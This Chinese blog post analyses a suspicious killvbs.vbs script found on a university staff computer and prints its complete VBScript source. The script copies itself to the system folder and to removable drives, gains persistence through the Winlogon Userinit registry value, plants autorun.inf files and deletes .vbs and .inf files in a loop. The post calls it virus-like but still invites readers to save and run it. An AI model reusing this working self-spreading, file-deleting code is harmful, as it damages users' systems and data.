不是病毒的病毒

Share

可疑文件:killvbs.vbs

发现者:杜少卿

文件来源:USST宣传部副部长的计算机内

症状:执行该文件后发现各盘符的autorun.inf文件自动被删除,并且新建autorun配置文件后依旧被删除,且响应频率极高.后在进程和启动项中都发现可疑项目.最后定位于根文件killvbs.vbs,打开后发现如下代码:

——————————————————————————–

killvbs.vbs代码
'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'**********************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFileAllFile = AllFile & ReadAll.readline
AllFileAllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive
If Drives.DriveType=2 Then
LookVBS "inf",Drives.Path & "\"
LookVBS "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
LookVBS "vbs",WinDir & "\"
LookVBS "vbs",Drives.Path & "\"
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

——————————————————————————–

分析:根据寝室里一位MCP(Microsoft Certified Professionals微软认证专家)描述,该文件本意是清除系统中的自动运行配置文件(文件开头也有所示意),以防止autorun病毒的运做,但其本身的行为已经具备了病毒文件的要素(见加亮彩色字体,写入注册表),故应识别为病毒文件.

——————————————————————————–

总结:文件编写者的初衷是好的,毕竟现在大多数的病毒是利用autorun来达到欺骗手段.可是程序的执行过程有点”黑”,之前已经有人想出方法来免疫U盘病毒文件了,但这种利用脚本来监控删除autorun的方式倒不失为一种殊途同归的新方式.(将代码保存为killvbs.vbs即为原可疑文件,可以尝试运行,但不推荐运行,后果自负)

SQ.DO

MCITP Enterprise Administrator

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.